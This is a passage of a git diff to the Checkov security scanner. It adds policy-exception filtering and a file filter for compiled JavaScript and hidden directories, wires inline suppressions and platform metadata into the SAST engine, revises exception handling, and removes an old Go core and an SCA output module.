-            runner_filter.set_suppressed_policies(list(policy_level_suppression.values()))
 
             if self.config.use_enforcement_rules:
                 runner_filter.apply_enforcement_rules(repo_config_integration.code_category_configs)
@@ -497,7 +491,8 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ
             if self.config.list:
                 print_checks(frameworks=self.config.framework, use_bc_ids=self.config.output_bc_ids,
                              include_all_checkov_policies=self.config.include_all_checkov_policies,
-                             filtered_policy_ids=runner_filter.filtered_policy_ids)
+                             filtered_policy_ids=runner_filter.filtered_policy_ids,
+                             filtered_exception_policy_ids=runner_filter.filtered_exception_policy_ids)
                 return None
 
             baseline = None
@@ -698,9 +693,20 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ
             logging.error(m)
             self.exit_run()
             return None
-        except BaseException:
+        except PlatformConnectionError:
+            # we don't want to print all of these stack traces in normal output, as these could be user error
+            # and stack traces look like checkov bugs
+            logging.debug("Exception traceback:", exc_info=True)
+            self.exit_run()
+            return None
+        except SystemExit:
+            # calling exit_run from an exception handler causes another exception that is caught here, so we just need to re-exit
+            self.exit_run()
+            return None
+        except BaseException:  # noqa: B036 # we need to catch any failure and exit properly
             logging.error("Exception traceback:", exc_info=True)
-            raise
+            self.exit_run()
+            return None
 
         finally:
             if bc_integration.support_flag_enabled:
@@ -743,6 +749,10 @@ def get_external_checks_dir(self) -> list[str]:
             git_getter = GitGetter(url=self.config.external_checks_git[0])
             external_checks_dir = [git_getter.get()]
             atexit.register(shutil.rmtree, str(Path(external_checks_dir[0]).parent))
+        if bc_integration.sast_custom_policies:
+            if not external_checks_dir:
+                external_checks_dir = []
+            external_checks_dir.append(bc_integration.sast_custom_policies)
         return external_checks_dir
 
     def upload_results(
diff --git a/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py b/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py
index b939c757a11..27ce6745dac 100644
--- a/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py
+++ b/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py
@@ -26,7 +26,7 @@ def scan_openapi_conf(self, conf: dict[str, Any], entity_type: str) -> tuple[Che
         for name, security_scheme in security_schemes.items():
             if name in self.irrelevant_keys:
                 continue
-            if isinstance(security_scheme, dict) and (security_scheme.get('type') == 'http' or security_scheme.get('scheme') == 'basic'):
+            if isinstance(security_scheme, dict) and (security_scheme.get('type') == 'http' and security_scheme.get('scheme') == 'basic'):
                 return CheckResult.FAILED, security_scheme
 
         if not isinstance(paths, dict):
diff --git a/checkov/policies_3d/output.py b/checkov/policies_3d/output.py
index a08faf5f553..116dc75cd7a 100644
--- a/checkov/policies_3d/output.py
+++ b/checkov/policies_3d/output.py
@@ -2,6 +2,7 @@
 
 import itertools
 import logging
+import sys
 from collections import defaultdict
 from typing import List, Dict, Any
 
@@ -242,6 +243,11 @@ def create_iac_violations_overview_table_part(
         table_width: int, column_width: int, resource_violation_details_map: Dict[str, Dict[str, Any]]
 ) -> List[str]:
     iac_table_lines: List[str] = []
+
+    # on python 3.12 and above, the columns are smaller, need to make them wider in order to have consistency.
+    if sys.version_info >= (3, 12):
+        table_width += 3
+
     iac_table = PrettyTable(
         min_table_width=table_width,
         max_table_width=table_width
diff --git a/checkov/runner_filter.py b/checkov/runner_filter.py
index 5be3e12805f..83911694936 100644
--- a/checkov/runner_filter.py
+++ b/checkov/runner_filter.py
@@ -46,6 +46,7 @@ def __init__(
             skip_cve_package: Optional[List[str]] = None,
             use_enforcement_rules: bool = False,
             filtered_policy_ids: Optional[List[str]] = None,
+            filtered_exception_policy_ids: Optional[List[str]] = None,
             show_progress_bar: Optional[bool] = True,
             run_image_referencer: bool = False,
             enable_secret_scan_all_files: bool = False,
@@ -108,6 +109,10 @@ def __init__(
                 self.skip_checks.append(val)
 
         self.include_all_checkov_policies = include_all_checkov_policies
+        if not framework or "all" in framework:
+            self.framework_flag_values = []
+        else:
+            self.framework_flag_values = framework
 
         self.framework: "Iterable[str]" = framework if framework else ["all"]
         if skip_framework:
@@ -128,6 +133,7 @@ def __init__(
         self.var_files = var_files
         self.skip_cve_package = skip_cve_package
         self.filtered_policy_ids = filtered_policy_ids or []
+        self.filtered_exception_policy_ids = filtered_exception_policy_ids or []
         self.run_image_referencer = run_image_referencer
         self.enable_secret_scan_all_files = enable_secret_scan_all_files
         self.block_list_secret_scan = block_list_secret_scan
@@ -225,6 +231,7 @@ def should_run_check(
         implicit_run = not self.checks and not check_threshold
         is_external = RunnerFilter.is_external_check(check_id)
         is_policy_filtered = self.is_policy_filtered(check_id)
+        is_policy_exception = self.is_policy_exception(check_id)
         # True if this check is present in the allow list, or if there is no allow list
         # this is not necessarily the return value (need to apply other filters)
         should_run_check = (
@@ -243,6 +250,10 @@ def should_run_check(
         if not is_policy_filtered:
             logging.debug(f'not is_policy_filtered {check_id}: should_run_check = False')
             should_run_check = False
+        # If a policy is present in the list of filter exception policies, it should not be run - implicitly or explicitly.
+        if is_policy_exception:
+            logging.debug(f'is_policy_exception {check_id}: should_run_check = False')
+            should_run_check = False
 
         skip_severity = severity and skip_check_threshold and severity.level <= skip_check_threshold.level
         explicit_skip = self.skip_checks and self.check_matches(check_id, bc_check_id, self.skip_checks)
@@ -329,6 +340,11 @@ def is_policy_filtered(self, check_id: str) -> bool:
             return True
         return check_id in self.filtered_policy_ids
 
+    def is_policy_exception(self, check_id: str) -> bool:
+        if not self.filtered_exception_policy_ids:
+            return False
+        return check_id in self.filtered_exception_policy_ids
+
     def to_dict(self) -> Dict[str, Any]:
         result: Dict[str, Any] = {}
         for key, value in self.__dict__.items():
@@ -364,6 +380,7 @@ def from_dict(obj: Dict[str, Any]) -> RunnerFilter:
         if use_enforcement_rules is None:
             use_enforcement_rules = False
         filtered_policy_ids = obj.get('filtered_policy_ids')
+        filtered_exception_policy_ids = obj.get('filtered_exception_policy_ids')
         show_progress_bar = obj.get('show_progress_bar')
         if show_progress_bar is None:
             show_progress_bar = True
@@ -375,13 +392,14 @@ def from_dict(obj: Dict[str, Any]) -> RunnerFilter:
         runner_filter = RunnerFilter(framework, checks, skip_checks, include_all_checkov_policies,
                                      download_external_modules, external_modules_download_path, evaluate_variables,
                                      runners, skip_framework, excluded_paths, all_external, var_files,
-                                     skip_cve_package, use_enforcement_rules, filtered_policy_ids, show_progress_bar,
-                                     run_image_referencer, enable_secret_scan_all_files, block_list_secret_scan)
+                                     skip_cve_package, use_enforcement_rules, filtered_policy_ids, filtered_exception_policy_ids,
+                                     show_progress_bar, run_image_referencer, enable_secret_scan_all_files, block_list_secret_scan)
         return runner_filter
 
-    def set_suppressed_policies(self, policy_level_suppressions: List[str]) -> None:
+    def set_suppressed_policies(self, policy_level_suppressions: List[List[str]]) -> None:
         logging.debug(f"Received the following policy-level suppressions, that will be skipped from running: {policy_level_suppressions}")
-        self.suppressed_policies = policy_level_suppressions
+        # flatten
+        self.suppressed_policies = [suppression for suppression_list in policy_level_suppressions for suppression in suppression_list]
 
     @staticmethod
     def get_sast_languages(frameworks: Optional[List[str]], skip_framework: Optional[List[str]]) -> Set[SastLanguages]:
diff --git a/checkov/sast/checks_infra/base_registry.py b/checkov/sast/checks_infra/base_registry.py
index 9897c7e93cf..8f4db5a4c9e 100644
--- a/checkov/sast/checks_infra/base_registry.py
+++ b/checkov/sast/checks_infra/base_registry.py
@@ -6,16 +6,13 @@
 from typing import List, Any, Optional, Dict
 
 from checkov.common.bridgecrew.check_type import CheckType
-from checkov.common.bridgecrew.wrapper import CDK_FRAMEWORK_PREFIX
+
 from checkov.common.checks.base_check_registry import BaseCheckRegistry
 from checkov.runner_filter import RunnerFilter
 
 logger = logging.getLogger(__name__)
 
 
-CDK_CHECKS_DIR_PATH = f'{os.getcwd()}/checkov/{CDK_FRAMEWORK_PREFIX}/checks'
-
-
 class Registry(BaseCheckRegistry):
     def __init__(self, checks_dir: str | None = None) -> None:
         super().__init__(report_type=CheckType.SAST)
diff --git a/checkov/sast/engines/files_filter_manager.py b/checkov/sast/engines/files_filter_manager.py
new file mode 100644
index 00000000000..71d64484d23
--- /dev/null
+++ b/checkov/sast/engines/files_filter_manager.py
@@ -0,0 +1,101 @@
+import logging
+import os
+import json
+from typing import Set, List, Dict
+
+from checkov.common.runners.base_runner import IGNORE_HIDDEN_DIRECTORY_ENV, ignored_directories
+from checkov.common.sast.consts import SastLanguages
+
+
+class FilesFilterManager:
+    def __init__(self, source_codes: List[str], languages: Set[SastLanguages]) -> None:
+        self.source_codes: List[str] = source_codes
+        self.languages: Set[SastLanguages] = languages
+
+    def get_files_to_filter(self) -> List[str]:
+        files_to_filter: List[str] = []
+        try:
+            if SastLanguages.JAVASCRIPT in self.languages:
+                files_to_filter += self._get_js_files_to_filter()
+            files_to_filter += self._filter_hidden_files()
+        except Exception as e:
+            logging.debug(f'Error filtering js files generated by ts: {e}')
+        return files_to_filter
+
+    def _get_js_files_to_filter(self) -> List[str]:
+        js_files_to_filter = []
+
+        for path in self.source_codes:
+            js_files: List[Dict[str, str]] = []
+            ts_files: List[Dict[str, str]] = []
+            tsconfig_files: List[Dict[str, str]] = []
+            for (dirpath, _, filenames) in os.walk(path):
+                if '/node_modules/' in dirpath:
+                    continue
+                for filename in filenames:
+                    if filename.endswith('.ts'):
+                        ts_files.append({'full_path': os.sep.join([dirpath, filename]), 'dir': dirpath, 'name': filename})
+                    if filename.endswith('tsconfig.json'):
+                        tsconfig_files.append({'full_path': os.sep.join([dirpath, filename]), 'dir': dirpath, 'name': filename})
+                    if filename.endswith('.js'):
+                        js_files.append({'full_path': os.sep.join([dirpath, filename]), 'dir': dirpath, 'name': filename})
+
+            js_files_to_filter += FilesFilterManager._filter_by_tsconfig(tsconfig_files)
+            js_files_to_filter += FilesFilterManager._filter_direct_build_js(js_files, ts_files, js_files_to_filter)
+
+        return js_files_to_filter
+
+    @staticmethod
+    def _filter_direct_build_js(js_files: List[Dict[str, str]], ts_files: List[Dict[str, str]], filtered_by_tsconfig: List[str]) -> List[str]:
+        js_files_to_filter: List[str] = []
+        for js_file in js_files:
+            js_dir = js_file.get('dir', '')
+            already_skipped = False
+            for filtered_by_tsconfig_path in filtered_by_tsconfig:
+                if js_dir.startswith(filtered_by_tsconfig_path):
+                    already_skipped = True
+                    break
+            if already_skipped:
+                continue
+            for ts_file in ts_files:
+                if ts_file.get('dir', '') == js_dir and ts_file.get('name', '')[:-3] == js_file.get('name', '')[:-3]:
+                    js_files_to_filter.append(js_file.get('full_path', ''))
+                    break
+        return js_files_to_filter
+
+    @staticmethod
+    def _filter_by_tsconfig(tsconfig_files: List[Dict[str, str]]) -> List[str]:
+        js_files_to_filter: List[str] = []
+        for tsconfig_file in tsconfig_files:
+            with open(tsconfig_file.get('full_path', '')) as fp:
+                config = json.load(fp)
+            out_dir = config.get('compilerOptions', {}).get('outDir')
+            out_file = config.get('compilerOptions', {}).get('outFile')
+            if out_dir:
+                build_dir = out_dir
+            elif out_file:
+                build_dir = out_file
+            else:
+                build_dir = tsconfig_file.get('dir')
+
+            # relative path
+            if not build_dir.startswith('/'):
+                build_path = os.path.abspath(tsconfig_file.get('dir', '') + '/' + build_dir)
+            # absolute path
+            else:
+                build_path = build_dir
+            js_files_to_filter.append(build_path)
+        return js_files_to_filter
+
+    def _filter_hidden_files(self) -> List[str]:
+        # consider ENV variable to ignore hidden directories (CKV_IGNORED_DIRECTORIES, CKV_IGNORE_HIDDEN_DIRECTORIES)
+        paths_to_filter: List[str] = ignored_directories.copy()
+        if not IGNORE_HIDDEN_DIRECTORY_ENV:
+            return paths_to_filter
+        for path in self.source_codes:
+            for (_dirpath, dirs, _) in os.walk(path):
+                for directory in dirs:
+                    if directory.startswith('.'):
+                        paths_to_filter.append(directory)
+
+        return paths_to_filter
diff --git a/checkov/sast/engines/prisma_engine.py b/checkov/sast/engines/prisma_engine.py
index 6e8a10a0637..7d0b0c4c0eb 100644
--- a/checkov/sast/engines/prisma_engine.py
+++ b/checkov/sast/engines/prisma_engine.py
@@ -14,9 +14,9 @@
 
 from checkov.common.bridgecrew.check_type import CheckType
 from checkov.common.bridgecrew.platform_integration import bc_integration
+from checkov.common.bridgecrew.integration_features.features.policy_metadata_integration import integration as policy_metadata_integration
 from checkov.common.bridgecrew.platform_key import bridgecrew_dir
 from checkov.common.bridgecrew.severities import get_severity, Severity, Severities, BcSeverities
-from checkov.common.bridgecrew.wrapper import CDK_FRAMEWORK_PREFIX
 from checkov.common.models.enums import CheckResult
 from checkov.common.output.report import Report
 from checkov.common.sast.consts import CDKLanguages, SastLanguages
@@ -28,10 +28,12 @@
 from checkov.sast.engines.base_engine import SastEngine
 from checkov.sast.prisma_models.library_input import LibraryInput
 from checkov.sast.prisma_models.policies_list import SastPolicies
+from checkov.common.sast.consts import CDK_FRAMEWORK_PREFIX
 from checkov.common.sast.report_types import PrismaReport, RuleMatch, create_empty_report
 from checkov.sast.record import SastRecord
 from checkov.sast.report import SastReport
 from checkov.cdk.report import CDKReport
+from checkov.sast.engines.files_filter_manager import FilesFilterManager
 
 logger = logging.getLogger(__name__)
 
@@ -47,6 +49,7 @@ def __init__(self) -> None:
         self.check_type = CheckType.SAST
         self.prisma_sast_dir_path = Path(bridgecrew_dir) / "sast"
         self.sast_platform_base_path = "api/v1/sast"
+        self.enable_inline_suppressions = os.getenv("ENABLE_SAST_INLINE_SUPPRESSIONS", False)
 
     def get_check_thresholds(self, registry: Registry) -> Tuple[Severity, Severity]:
         """
@@ -83,6 +86,11 @@ def get_reports(self, targets: List[str], registry: Registry, languages: Set[Sas
 
         check_threshold, skip_check_threshold = self.get_check_thresholds(registry)
 
+        skip_paths = registry.runner_filter.excluded_paths if registry.runner_filter else []
+
+        files_filter_manager = FilesFilterManager(targets, languages)
+        skip_paths += files_filter_manager.get_files_to_filter()
+
         library_input: LibraryInput = {
             'languages': languages,
             'source_codes': targets,
@@ -91,7 +99,8 @@ def get_reports(self, targets: List[str], registry: Registry, languages: Set[Sas
             'skip_checks': registry.runner_filter.skip_checks if registry.runner_filter else [],
             'check_threshold': check_threshold,
             'skip_check_threshold': skip_check_threshold,
-            'skip_path': registry.runner_filter.excluded_paths if registry.runner_filter else [],
+            'platform_check_metadata': policy_metadata_integration.sast_check_metadata or {},
+            'skip_path': skip_paths,
             'report_imports': registry.runner_filter.report_sast_imports if registry.runner_filter else False,
             'remove_default_policies': registry.runner_filter.remove_default_sast_policies if registry.runner_filter else False,
             'report_reachability': registry.runner_filter.report_sast_reachability if registry.runner_filter else False,
@@ -194,6 +203,7 @@ def run_go_library(self, languages: Set[SastLanguages],
                        skip_path: List[str],
                        check_threshold: Severity,
                        skip_check_threshold: Severity,
+                       platform_check_metadata: Dict[str, Any],
                        cdk_languages: List[CDKLanguages],
                        list_policies: bool = False,
                        report_imports: bool = True,
@@ -223,6 +233,7 @@ def run_go_library(self, languages: Set[SastLanguages],
                 "skip_path": skip_path,
                 "check_threshold": str(check_threshold),
                 "skip_check_threshold": str(skip_check_threshold),
+                "platform_check_metadata": platform_check_metadata,
                 "list_policies": list_policies,
                 "report_imports": report_imports,
                 "remove_default_policies": remove_default_policies,
@@ -302,13 +313,13 @@ def create_report(self, prisma_report: PrismaReport) -> List[Union[SastReport, C
         reports: List[SastReport] = []
         for lang, checks in prisma_report.rule_match.items():
             sast_report = PrismaReport(rule_match={lang: checks}, errors=prisma_report.errors, profiler=prisma_report.profiler,
-                                       run_metadata=prisma_report.run_metadata, imports={}, reachability_report={})
+                                       run_metadata=prisma_report.run_metadata, imports={}, reachability_report={},
+                                       skipped_checks_by_file=prisma_report.skipped_checks_by_file)
             report = SastReport(f'{self.check_type.lower()}_{lang.value}', prisma_report.run_metadata, lang, sast_report)
             for check_id, match_rule in checks.items():
                 check_name = match_rule.check_name
                 check_cwe = match_rule.check_cwe
                 check_owasp = match_rule.check_owasp
-                check_result = _CheckResult(result=CheckResult.FAILED)
                 severity = get_severity(match_rule.severity)
 
                 for match in match_rule.matches:
@@ -320,6 +331,12 @@ def create_report(self, prisma_report: PrismaReport) -> List[Union[SastReport, C
                     code_block = get_code_block_from_start(split_code_block, location.start.row)
                     metadata = match.metadata
 
+                    if self.enable_inline_suppressions and any(skipped_check.check_id == match_rule.check_id for skipped_check in prisma_report.skipped_checks_by_file.get(file_abs_path, [])):
+                        check_result = _CheckResult(
+                            result=CheckResult.SKIPPED,
+                            suppress_comment=next(skipped_check.suppress_comment for skipped_check in prisma_report.skipped_checks_by_file.get(file_abs_path, []) if skipped_check.check_id == match_rule.check_id))
+                    else:
+                        check_result = _CheckResult(result=CheckResult.FAILED)
                     record = SastRecord(check_id=check_id, check_name=check_name, resource="", evaluations={},
                                         check_class="", check_result=check_result, code_block=code_block,
                                         file_path=file_path, file_line_range=file_line_range, metadata=metadata,
@@ -338,7 +355,8 @@ def create_report(self, prisma_report: PrismaReport) -> List[Union[SastReport, C
                     break
             else:
                 sast_report = PrismaReport(rule_match={lang: {}}, errors=prisma_report.errors, profiler=prisma_report.profiler,
-                                           run_metadata=prisma_report.run_metadata, imports={}, reachability_report={})
+                                           run_metadata=prisma_report.run_metadata, imports={}, reachability_report={},
+                                           skipped_checks_by_file={})
                 report = SastReport(f'{self.check_type.lower()}_{lang.value}', prisma_report.run_metadata, lang, sast_report)
                 report.sast_imports = prisma_report.imports[lang]
                 reports.append(report)
@@ -350,7 +368,8 @@ def create_report(self, prisma_report: PrismaReport) -> List[Union[SastReport, C
                     break
             else:
                 sast_report = PrismaReport(rule_match={lang: {}}, errors=prisma_report.errors, profiler=prisma_report.profiler,
-                                           run_metadata=prisma_report.run_metadata, imports={}, reachability_report={})
+                                           run_metadata=prisma_report.run_metadata, imports={}, reachability_report={},
+                                           skipped_checks_by_file={})
                 report = SastReport(f'{self.check_type.lower()}_{lang.value}', prisma_report.run_metadata, lang, sast_report)
                 report.sast_reachability = prisma_report.reachability_report[lang]
                 reports.append(report)
@@ -383,7 +402,7 @@ def _update_cdk_report(lang: SastLanguages, cdk_reports: List[CDKReport], sast_r
             new_cdk_report = PrismaReport(rule_match={lang: {}}, errors=sast_report.sast_report.errors,
                                           profiler=sast_report.sast_report.profiler,
                                           run_metadata=sast_report.sast_report.run_metadata,
-                                          imports={}, reachability_report={})
+                                          imports={}, reachability_report={}, skipped_checks_by_file={})
             new_report = CDKReport(f'{CDK_FRAMEWORK_PREFIX}_{lang.value}', sast_report.sast_report.run_metadata, lang, new_cdk_report)
             cdk_reports.append(new_report)
         for cdk_report in cdk_reports:
@@ -459,6 +478,7 @@ def get_policies(self, languages: Set[SastLanguages]) -> SastPolicies:
             'skip_checks': [],
             'check_threshold': Severities[BcSeverities.NONE],
             'skip_check_threshold': Severities[BcSeverities.NONE],
+            'platform_check_metadata': policy_metadata_integration.sast_check_metadata,
             'skip_path': [],
             'report_imports': False,
             'report_reachability': False,
diff --git a/checkov/sast/prisma_models/library_input.py b/checkov/sast/prisma_models/library_input.py
index c4ba4e6b0ac..2780f4f8623 100644
--- a/checkov/sast/prisma_models/library_input.py
+++ b/checkov/sast/prisma_models/library_input.py
@@ -1,4 +1,4 @@
-from typing import Set, List
+from typing import Set, List, Dict, Any
 
 from checkov.common.bridgecrew.severities import Severity
 from checkov.common.sast.consts import SastLanguages, CDKLanguages
@@ -18,6 +18,7 @@ class LibraryInput(TypedDict):
     skip_path: List[str]
     check_threshold: Severity
     skip_check_threshold: Severity
+    platform_check_metadata: Dict[str, Any]
     list_policies: NotRequired[bool]
     report_imports: bool
     remove_default_policies: NotRequired[bool]
diff --git a/checkov/sast/runner.py b/checkov/sast/runner.py
index 351c65bd37c..ac28a192943 100644
--- a/checkov/sast/runner.py
+++ b/checkov/sast/runner.py
@@ -3,14 +3,17 @@
 import logging
 import os
 import sys
+from checkov.common.util.type_forcers import convert_str_to_bool
+from checkov.common.sast.consts import SastLanguages
+
 
 from checkov.common.bridgecrew.check_type import CheckType
 from checkov.common.bridgecrew.platform_integration import bc_integration
 from checkov.common.output.report import Report
 from checkov.common.runners.base_runner import BaseRunner
-from checkov.common.sast.consts import SUPPORT_FILE_EXT, FILE_EXT_TO_SAST_LANG, CDKLanguages
+from checkov.common.sast.consts import SUPPORT_FILE_EXT, FILE_EXT_TO_SAST_LANG, CDKLanguages, CDK_CHECKS_DIR_PATH
 from checkov.runner_filter import RunnerFilter
-from checkov.sast.checks_infra.base_registry import CDK_CHECKS_DIR_PATH, Registry
+from checkov.sast.checks_infra.base_registry import Registry
 from checkov.sast.engines.prisma_engine import PrismaEngine
 
 from typing import List, Optional
@@ -41,7 +44,8 @@ def run(self, root_folder: Optional[str],
             collect_skip_comments: bool = True) -> List[Report]:
 
         if sys.platform.startswith('win'):
-            # TODO: Enable SAST for windows runners
+            logger.warning('Skip SAST for windows')
+            # TODO: Enable SAST for windows runners.
             return [Report(self.check_type)]
 
         if not runner_filter:
@@ -53,6 +57,11 @@ def run(self, root_folder: Optional[str],
             bc_integration.setup_http_manager()
             bc_integration.set_s3_client()
 
+        # Todo remove when golang is stable in platform
+        if not bool(convert_str_to_bool(os.getenv('ENABLE_SAST_GOLANG', False))):
+            if SastLanguages.GOLANG in runner_filter.sast_languages:
+                runner_filter.sast_languages.remove(SastLanguages.GOLANG)
+
         # registry get all the paths
         self.registry.set_runner_filter(runner_filter)
         self.registry.add_external_dirs(external_checks_dir)
@@ -66,7 +75,7 @@ def run(self, root_folder: Optional[str],
             targets.extend([a if os.path.isabs(a) else os.path.abspath(a) for a in files])
 
         if self.cdk_langs:
-            self.registry.checks_dirs_path.append(CDK_CHECKS_DIR_PATH)
+            self.registry.checks_dirs_path.append(str(CDK_CHECKS_DIR_PATH))
 
         reports = []
         try:
diff --git a/checkov/sast_core/Makefile b/checkov/sast_core/Makefile
deleted file mode 100644
index 660b062f235..00000000000
--- a/checkov/sast_core/Makefile
+++ /dev/null
@@ -1,2 +0,0 @@
-build:
-	go build -buildmode=c-shared -o library.so library.go
diff --git a/checkov/sast_core/go.mod b/checkov/sast_core/go.mod
deleted file mode 100644
index 6558600a0b9..00000000000
--- a/checkov/sast_core/go.mod
+++ /dev/null
@@ -1,5 +0,0 @@
-module github.com/bridgecrewio/checkov/checkov/sast_core
-
-go 1.19
-
-require github.com/smacker/go-tree-sitter v0.0.0-20230226123037-c459dbde1464
diff --git a/checkov/sast_core/go.sum b/checkov/sast_core/go.sum
deleted file mode 100644
index 60c69ebe2cf..00000000000
--- a/checkov/sast_core/go.sum
+++ /dev/null
@@ -1,16 +0,0 @@
-github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
-github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
-github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
-github.com/smacker/go-tree-sitter v0.0.0-20230226123037-c459dbde1464 h1:hd1+Vqu6uQZlNG0hGncjAvqENdxfAd0X4MKR2Tjclt8=
-github.com/smacker/go-tree-sitter v0.0.0-20230226123037-c459dbde1464/go.mod h1:q99oHDsbP0xRwmn7Vmob8gbSMNyvJ83OauXPSuHQuKE=
-github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
-github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw=
-github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
-github.com/stretchr/testify v1.7.4 h1:wZRexSlwd7ZXfKINDLsO4r7WBt3gTKONc6K/VesHvHM=
-github.com/stretchr/testify v1.7.4/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU=
-gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
-gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
-gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
-gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
diff --git a/checkov/sast_core/library.go b/checkov/sast_core/library.go
deleted file mode 100644
index ede1821f3f3..00000000000
--- a/checkov/sast_core/library.go
+++ /dev/null
@@ -1,42 +0,0 @@
-package main
-
-import (
-	"C"
-	"encoding/json"
-	"log"
-
-	sitter "github.com/smacker/go-tree-sitter"
-	"github.com/smacker/go-tree-sitter/python"
-)
-
-type CheckovDocument struct {
-	SourceCodeFile string `json:"source_code_file"`
-	SourceCodeDir  string `json:"source_code_dir"`
-	PolicyDir      string `json:"policy_dir"`
-	PoliciyFile    string `json:"policiy_file"`
-	Language       string `json:"language"`
-}
-
-var langs = map[string]*sitter.Language{
-	"python": python.GetLanguage(),
-}
-
-//export analyzeCode
-func analyzeCode(documentPtr *C.char) *C.char {
-	documentString := C.GoString(documentPtr)
-	jsonDocument := CheckovDocument{}
-	err := json.Unmarshal([]byte(documentString), &jsonDocument)
-	if err != nil {
-		log.Fatal(err)
-	}
-	log.Println(jsonDocument)
-	parser := sitter.NewParser()
-	parser.SetLanguage(langs[jsonDocument.Language])
-
-	mapD := map[string]int{"matches": 0, "profiler": 0}
-	toReturn, _ := json.Marshal(mapD)
-	return C.CString(string(toReturn))
-}
-
-func main() {
-}
diff --git a/checkov/sca_image/runner.py b/checkov/sca_image/runner.py
index e74578de8c7..7adb8d3f9f3 100644
--- a/checkov/sca_image/runner.py
+++ b/checkov/sca_image/runner.py
@@ -25,7 +25,7 @@
 from checkov.common.util.dockerfile import is_dockerfile
 from checkov.common.util.http_utils import request_wrapper
 from checkov.runner_filter import RunnerFilter
-from checkov.sca_package.runner import Runner as PackageRunner
+from checkov.sca_package_2.runner import Runner as PackageRunner
 
 
 class Runner(PackageRunner):
diff --git a/checkov/sca_package/output.py b/checkov/sca_package/output.py
deleted file mode 100644
index 3e14cacb6af..00000000000
--- a/checkov/sca_package/output.py
+++ /dev/null
@@ -1,360 +0,0 @@
-from __future__ import annotations
-
-import itertools
-import logging
-from collections import defaultdict
-from dataclasses import dataclass
-from typing import List, Union, Dict, Any
-
-from prettytable import PrettyTable, SINGLE_BORDER
-
-from checkov.common.bridgecrew.severities import BcSeverities
-from checkov.common.models.enums import CheckResult
-from checkov.common.output.common import compare_table_items_severity
-from checkov.common.output.record import Record, SCA_PACKAGE_SCAN_CHECK_NAME, SCA_LICENSE_CHECK_NAME
-from checkov.common.packaging import version as packaging_version
-from checkov.common.sca.commons import UNFIXABLE_VERSION, get_package_alias
-from checkov.common.typing import _LicenseStatus
-
-
-@dataclass
-class CveCount:
-    total: int = 0
-    critical: int = 0
-    high: int = 0
-    medium: int = 0
-    low: int = 0
-    skipped: int = 0
-    has_fix: int = 0
-    to_fix: int = 0
-    fixable: bool = True
-
-    def output_row(self) -> List[str]:
-        return [
-            f"Total CVEs: {self.total}",
-            f"critical: {self.critical}",
-            f"high: {self.high}",
-            f"medium: {self.medium}",
-            f"low: {self.low}",
-            f"skipped: {self.skipped}",
-        ]
-
-
-def calculate_lowest_compliant_version(
-    fix_versions_lists: List[List[Union[packaging_version.Version, packaging_version.LegacyVersion]]]
-) -> str:
-    """A best effort approach to find the lowest compliant version"""
-
-    package_min_versions = set()
-    package_versions = set()
-
-    for fix_versions in fix_versions_lists:
-        if fix_versions:
-            package_min_versions.add(min(fix_versions))
-            package_versions.update(fix_versions)
-    if package_min_versions:
-        package_min_version = min(package_min_versions)
-        package_max_version = max(package_min_versions)
-
-        if isinstance(package_min_version, packaging_version.LegacyVersion) or isinstance(
-            package_max_version, packaging_version.LegacyVersion
-        ):
-            return str(package_max_version)
-        elif package_min_version.major == package_max_version.major:
-            return str(package_max_version)
-        else:
-            lowest_version = max(
-                version
-                for version in package_versions
-                if isinstance(version, packaging_version.Version) and version.major == package_max_version.major
-            )
-            return str(lowest_version)
-
-    return UNFIXABLE_VERSION
-
-
-def create_cli_output(fixable: bool = True, *cve_records: list[Record]) -> str:
-    cli_outputs = []
-    group_by_file_path_package_map: dict[str, dict[str, list[Record]]] = defaultdict(dict)
-
-    for record in itertools.chain(*cve_records):
-        if not record.vulnerability_details:
-            #  this shouldn't happen
-            logging.error(f"'vulnerability_details' is not set for {record.check_id}")
-            continue
-
-        group_by_file_path_package_map[record.file_path].setdefault(
-            record.vulnerability_details["package_name"], []
-        ).append(record)
-
-    for file_path, packages in group_by_file_path_package_map.items():
-        cve_count = CveCount(fixable=fixable)
-        package_cves_details_map: dict[str, dict[str, Any]] = defaultdict(dict)
-        package_licenses_details_map = defaultdict(list)
-        should_print_licenses_table = False
-        for package_name, records in packages.items():
-            package_version = None
-            fix_versions_lists = []
-
-            for record in records:
-                if not record.vulnerability_details:
-                    #  this shouldn't happen
-                    logging.error(f"'vulnerability_details' is not set for {record.check_id}")
-                    continue
-
-                if record.check_name == SCA_PACKAGE_SCAN_CHECK_NAME:
-                    cve_count.total += 1
-
-                    if record.check_result["result"] == CheckResult.SKIPPED:
